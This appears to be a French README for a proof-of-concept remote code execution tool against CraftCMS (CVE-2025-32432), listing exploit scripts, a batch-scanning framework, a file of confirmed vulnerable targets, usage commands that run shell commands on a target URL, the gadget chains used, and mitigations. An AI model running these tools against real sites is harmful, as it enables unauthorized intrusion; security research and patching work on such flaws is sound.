
POC généré par le correctif IA de CVE-2025-32432
Outil d'exploitation de vulnérabilité d'exécution de code à distance sur CraftCMS basé sur la recherche de SensePost.
final_poc.py - POC final optimisé
test.py - Version simplifiée basée sur l'article original de SensePost
yii\rbac\PhpManagerautomated_testing.py - Cadre de test automatisé
exploit_summary.md - Résumé de l'analyse de la vulnérabilitétest_results.json - Résultats des tests automatisésvulnerable.txt - Liste des cibles avec vulnérabilité confirmée# Test POC de base
python3 final_poc.py https://target.com/ id
# Mode débogage
python3 final_poc.py https://target.com/ "whoami" --debug
# Version simplifiée
python3 test.py https://target.com/ "ls -la"
# Créer un fichier de cibles
python3 automated_testing.py --create-targets
# Exécuter les tests en lot
python3 automated_testing.py
GuzzleHttp\Psr7\FnStream pour appeler phpinfo()yii\rbac\PhpManager pour charger le code PHP à partir d'un fichier de sessionMettez à jour CraftCMS vers une version corrigée :
Activez Site Lock pour protéger le panneau d'administration
Limitez les permissions d'accès aux fichiers de session
Déployez des règles WAF pour détecter les charges utiles malveillantes
Cet outil est destiné uniquement à la recherche en sécurité et aux tests d'intrusion autorisés. L'utilisateur doit se conformer aux lois et réglementations locales et ne pas l'utiliser à des fins illégales.